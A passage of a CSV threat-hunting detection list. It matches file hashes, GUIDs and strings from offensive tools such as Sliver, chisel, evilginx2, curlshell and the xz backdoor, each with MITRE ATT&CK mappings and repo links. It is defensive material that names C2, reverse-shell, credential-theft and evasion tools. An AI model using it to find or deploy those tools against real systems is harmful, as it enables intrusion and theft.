"*b62a1f3b8e0f601e835993277defc6df4912af3db9cbecd1e6dafa0f458926f4*",".{0,1000}b62a1f3b8e0f601e835993277defc6df4912af3db9cbecd1e6dafa0f458926f4.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*b63d2ec8180679831dea14c5fe8f85018c196d5f38dde79ffcfa839f87729188*",".{0,1000}b63d2ec8180679831dea14c5fe8f85018c196d5f38dde79ffcfa839f87729188.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*B64_ENCODED_PAYLOAD_UUID*",".{0,1000}B64_ENCODED_PAYLOAD_UUID.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*b64encode*.:::-989-:::.*",".{0,1000}b64encode.{0,1000}\.\:\:\:\-989\-\:\:\:\..{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation 
tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*b64payloadgen.sh*",".{0,1000}b64payloadgen\.sh.{0,1000}","offensive_tool_keyword","POC","exploitation of CVE-2021-4034","T1210","N/A","N/A","N/A","Exploitation tools","https://github.com/luijait/PwnKit-Exploit","1","1","N/A","N/A","1","82","15","2022-02-07T15:42:00Z","2022-01-26T18:01:26Z" "*b64stager*",".{0,1000}b64stager.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","759","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" "*B651A53C-FAE6-482E-A590-CA3B48B7F384*",".{0,1000}B651A53C\-FAE6\-482E\-A590\-CA3B48B7F384.{0,1000}","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","0","N/A","9","4","350","93","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" "*b670fbc71576142dedbc158f3b6b9e0a5889068759a13b2c8bdc14d1b85074a8*",".{0,1000}b670fbc71576142dedbc158f3b6b9e0a5889068759a13b2c8bdc14d1b85074a8.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. 
BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","N/A","10","10","1922","376","2024-04-30T13:32:24Z","2017-04-05T17:05:10Z" "*B67143DE-321D-4034-AC1D-C6BB2D98563F*",".{0,1000}B67143DE\-321D\-4034\-AC1D\-C6BB2D98563F.{0,1000}","offensive_tool_keyword","PrintSpoofer","Abusing Impersonation Privileges on Windows 10 and Server 2019","T1548.002 - T1055.001 - T1055.002","TA0005 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","0","N/A","10","10","1730","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" "*B67143DE-321D-4034-AC1D-C6BB2D98563F*",".{0,1000}B67143DE\-321D\-4034\-AC1D\-C6BB2D98563F.{0,1000}","offensive_tool_keyword","printspoofer","Abusing impersonation privileges through the Printer Bug","T1134 - T1003 - T1055","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","0","N/A","10","10","1730","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" "*b683f658cc3320b969164f1dd01ce028c2a2e8f69ed56695415805cb601b96cc*",".{0,1000}b683f658cc3320b969164f1dd01ce028c2a2e8f69ed56695415805cb601b96cc.{0,1000}","offensive_tool_keyword","veeam-creds","Collection of scripts to retrieve stored passwords from Veeam Backup","T1003 - T1555.005 - T1552","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/sadshade/veeam-creds","1","0","N/A","10","1","71","24","2023-01-17T13:57:27Z","2021-02-05T03:13:08Z" "*b68c9b6c076e1cdd44efd35fefe2f8da26aa4f271ecefce4e70af68acaf7541c*",".{0,1000}b68c9b6c076e1cdd44efd35fefe2f8da26aa4f271ecefce4e70af68acaf7541c.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*b691b9066d40a8d341e06f30cc7d94c3b1db62b3f49b5869c9b1e59828995550*",".{0,1000}b691b9066d40a8d341e06f30cc7d94c3b1db62b3f49b5869c9b1e59828995550.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*b6c4a39612179674c521ae2c35e3de0b91504adf36928c69e024e0c42e61e74c*",".{0,1000}b6c4a39612179674c521ae2c35e3de0b91504adf36928c69e024e0c42e61e74c.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*b6d7a37a1e42825a1e744a92fb5e39ada8ef3f71c494370b35b83c77ce06c344*",".{0,1000}b6d7a37a1e42825a1e744a92fb5e39ada8ef3f71c494370b35b83c77ce06c344.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*b6d88a58d1da289997258be70427b46ab2c124179a09bab72d3cf25c44c7ad92*",".{0,1000}b6d88a58d1da289997258be70427b46ab2c124179a09bab72d3cf25c44c7ad92.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*b6ffcd2adfacc8268724e5e8d97904743dcf15152eae87224134df705f916df3*",".{0,1000}b6ffcd2adfacc8268724e5e8d97904743dcf15152eae87224134df705f916df3.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*b74c431349454dc79731099eebfefca97b6b1d735e6c0269b5a4501e3fee6529*",".{0,1000}b74c431349454dc79731099eebfefca97b6b1d735e6c0269b5a4501e3fee6529.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*b74d7e3096956fd4bc7c929c2b482969f13a465058276ee97eb76c1d30529aa4*",".{0,1000}b74d7e3096956fd4bc7c929c2b482969f13a465058276ee97eb76c1d30529aa4.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*b7671f125bb2ed21d0476a00cfaa9ed6*",".{0,1000}b7671f125bb2ed21d0476a00cfaa9ed6.{0,1000}","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. 
By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","0","N/A","10","10","1275","159","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z" "*b782285888ed48a94f495d3eaa46fe9f29f7bf087197c719792b6e730afb937b*",".{0,1000}b782285888ed48a94f495d3eaa46fe9f29f7bf087197c719792b6e730afb937b.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*b7b5637287f143fe5e54c022e6c7b785141cfdeec2aceac263ee38e5ac17d3d7*",".{0,1000}b7b5637287f143fe5e54c022e6c7b785141cfdeec2aceac263ee38e5ac17d3d7.{0,1000}","offensive_tool_keyword","Diamorphine","LKM rootkit for Linux Kernels","T1547.006 - T1548.002 - T1562.001 - T1027","TA0003 - TA0004 - TA0005 - TA0006 - TA0007","N/A","N/A","Persistence","https://github.com/m0nad/Diamorphine","1","0","N/A","10","10","1664","407","2023-09-20T10:56:06Z","2013-11-06T22:38:47Z" "*b7bb45d67e4db4c923cf5e62d0fc8c9ae23abfe214c8daa730d343b0d9205837*",".{0,1000}b7bb45d67e4db4c923cf5e62d0fc8c9ae23abfe214c8daa730d343b0d9205837.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*b7c4eb1c120f959166ad5477119adb92db8081c61193847287a13fec1e780b24*",".{0,1000}b7c4eb1c120f959166ad5477119adb92db8081c61193847287a13fec1e780b24.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*b7c6bdd822f8710858ed799df49b711001e35901e24ba1726b71987d83cf3e76*",".{0,1000}b7c6bdd822f8710858ed799df49b711001e35901e24ba1726b71987d83cf3e76.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*b7c6d0220856790482d617170609b3fb76dfbcf7aaa97dac70767e7896151d86*",".{0,1000}b7c6d0220856790482d617170609b3fb76dfbcf7aaa97dac70767e7896151d86.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" 
"*b7c7c4caafe06600e68c48eed104ea895a933df2076198e27707af00996c336f*",".{0,1000}b7c7c4caafe06600e68c48eed104ea895a933df2076198e27707af00996c336f.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*b7d464d0d52a2c35760aa7cf90a90e1ea3513a8827b175aba5099a90dee416f9*",".{0,1000}b7d464d0d52a2c35760aa7cf90a90e1ea3513a8827b175aba5099a90dee416f9.{0,1000}","offensive_tool_keyword","EnableAllTokenPrivs","Enable or Disable TokenPrivilege(s)","T1134 - T1055","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/xvt-void/EnableAllTokenPrivs","1","0","N/A","7","1","11","3","2024-02-18T20:55:05Z","2024-02-17T15:39:25Z" "*b7e50a98223c9a3008aed3617b5b9282a40b7ef60fc274734d3970c7f9add804*",".{0,1000}b7e50a98223c9a3008aed3617b5b9282a40b7ef60fc274734d3970c7f9add804.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*b7f9eb0a95f3523aee8363c59e26a88bcf30d2160db862d4d167945ad342d777*",".{0,1000}b7f9eb0a95f3523aee8363c59e26a88bcf30d2160db862d4d167945ad342d777.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - 
TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*B7FF0EE8-6C68-46C6-AADB-58C0E3309FB2*",".{0,1000}B7FF0EE8\-6C68\-46C6\-AADB\-58C0E3309FB2.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*b80bb505227429df0b61a07d2ab57c02a48043fbd90d4680192b1698e9a2f37a*",".{0,1000}b80bb505227429df0b61a07d2ab57c02a48043fbd90d4680192b1698e9a2f37a.{0,1000}","offensive_tool_keyword","var0xshell","var0xshell - shell with xor encryption","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/yehia-mamdouh/var0xshell/tree/main","1","0","N/A","8","10","3","1","2023-01-09T06:53:42Z","2023-01-08T21:34:26Z" "*b8285e421d702738eab45670ecae439a7228994e7068b04cb51740e47efbfb41*",".{0,1000}b8285e421d702738eab45670ecae439a7228994e7068b04cb51740e47efbfb41.{0,1000}","offensive_tool_keyword","curlshell","reverse shell using curl","T1572","TA0002 - TA0011","N/A","N/A","C2","https://github.com/irsl/curlshell","1","0","N/A","10","10","424","69","2024-04-20T15:23:11Z","2023-07-13T19:38:34Z" "*b83141462b74d6d62282551eb34d139eb5c3071516f670af42c1dcc30d6547b2*",".{0,1000}b83141462b74d6d62282551eb34d139eb5c3071516f670af42c1dcc30d6547b2.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - 
TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*b83bd9409f469f3b094b81bdbf548e5449357ecd4c604d45f3ccd59c02e28a1e*",".{0,1000}b83bd9409f469f3b094b81bdbf548e5449357ecd4c604d45f3ccd59c02e28a1e.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*b83de77d08d842c68a940103588639cef6ab9f9fa12241311d9aed3690502af3*",".{0,1000}b83de77d08d842c68a940103588639cef6ab9f9fa12241311d9aed3690502af3.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*b83ee6d62e5e159fa0a16fcad953862a1d567abc5c60aa35dc02aac7efc87870*",".{0,1000}b83ee6d62e5e159fa0a16fcad953862a1d567abc5c60aa35dc02aac7efc87870.{0,1000}","offensive_tool_keyword","xz","backdoor in upstream xz/liblzma leading to ssh server compromise - rule author: @cyb3rops - link: https://x.com/cyb3rops/status/1776924344481984944","T1174 - T1056 - T1210 - T1550 - T1036 - T1077","TA0005 - TA0006 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","Malware","https://www.openwall.com/lists/oss-security/2024/03/29/4","1","0","rule author: @cyb3rops - link: https://x.com/cyb3rops/status/1776924344481984944","10","10","N/A","N/A","N/A","N/A" "*b83ee6d62e5e159fa0a16fcad953862a1d567abc5c60aa35dc02aac7efc87870*",".{0,1000}b83ee6d62e5e159fa0a16fcad953862a1d567abc5c60aa35dc02aac7efc87870.{0,1000}","offensive_tool_keyword","xz","backdoor in upstream xz/liblzma leading to ssh server compromise - rule author: @cyb3rops - link: https://github.com/Neo23x0/signature-base/blob/07daba7eb7bc44e6f73e199c6b9892241ab1b3d7/yara/bkdr_xz_util_cve_2024_3094.yar#L2","T1174 - T1056 - T1210 - T1550 - T1036 - T1077","TA0005 - TA0006 - TA0003 - TA0008 - TA0009 - 
TA0011","N/A","N/A","Malware","https://www.openwall.com/lists/oss-security/2024/03/29/4","1","0","https://www.virustotal.com/gui/file/b83ee6d62e5e159fa0a16fcad953862a1d567abc5c60aa35dc02aac7efc87870","10","10","N/A","N/A","N/A","N/A" "*b84798b914f570f9b52bf3fe754c2559795aa6c3daa4c4344f4bce69f5f759d9*",".{0,1000}b84798b914f570f9b52bf3fe754c2559795aa6c3daa4c4344f4bce69f5f759d9.{0,1000}","offensive_tool_keyword","killer","evade AVs and EDRs or security tools","T1564 - T1027 - T1070","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xHossam/Killer","1","0","N/A","10","7","N/A","N/A","N/A","N/A" "*b872e0bbe252aa4e33492453232f6320b8d35b536db2efbf9d50a1d4e5de14d7*",".{0,1000}b872e0bbe252aa4e33492453232f6320b8d35b536db2efbf9d50a1d4e5de14d7.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*B88B65D3-2689-4E39-892C-7532087174CB*",".{0,1000}B88B65D3\-2689\-4E39\-892C\-7532087174CB.{0,1000}","offensive_tool_keyword","RemotePotato0","Windows Privilege Escalation from User to Domain Admin.","T1078.002 - T1078.003 - T1078.004","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RemotePotato0","1","0","N/A","10","10","1281","200","2022-12-18T01:52:53Z","2021-02-08T22:02:19Z" "*b8939f328f43eafc2faa8ba8532a756eb9db47e00e947ad8543484b4b0958bb8*",".{0,1000}b8939f328f43eafc2faa8ba8532a756eb9db47e00e947ad8543484b4b0958bb8.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*b89570294bb08b6ac4245fe0db6e35c1b23fa01ad3a9ac0bfe07043c7af3350c*",".{0,1000}b89570294bb08b6ac4245fe0db6e35c1b23fa01ad3a9ac0bfe07043c7af3350c.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*b898e52e3799d4c3c4fa328c400ba620c814c11ca23d0b7ec2f3fd7917a7e8a1*",".{0,1000}b898e52e3799d4c3c4fa328c400ba620c814c11ca23d0b7ec2f3fd7917a7e8a1.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*b8ae91971edca5937251c1f9a09ca5eb2c48a98ef4a80187394f2c037bbefb46*",".{0,1000}b8ae91971edca5937251c1f9a09ca5eb2c48a98ef4a80187394f2c037bbefb46.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary 
emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*B8AEE3F1-0642-443C-B42C-33BADCD42365*",".{0,1000}B8AEE3F1\-0642\-443C\-B42C\-33BADCD42365.{0,1000}","offensive_tool_keyword","SignToolEx","Patching signtool.exe to accept expired certificates for code-signing","T1553.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/hackerhouse-opensource/SignToolEx","1","0","N/A","8","3","253","39","2023-12-29T15:08:41Z","2023-12-29T14:26:45Z" "*b8c9caeda6743d224835019b8bdc0105ad54f9a804a33e7e51acb605a8e8bc25*",".{0,1000}b8c9caeda6743d224835019b8bdc0105ad54f9a804a33e7e51acb605a8e8bc25.{0,1000}","offensive_tool_keyword","CelestialSpark","A modern 64-bit position independent meterpreter and Sliver compatible reverse_TCP Staging Shellcode based on Cracked5piders Stardust","T1572 - T1048 - T1041 - T1105","TA0005 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/Karkas66/CelestialSpark","1","0","N/A","10","10","53","6","2024-04-11T13:10:32Z","2024-04-11T12:17:22Z" 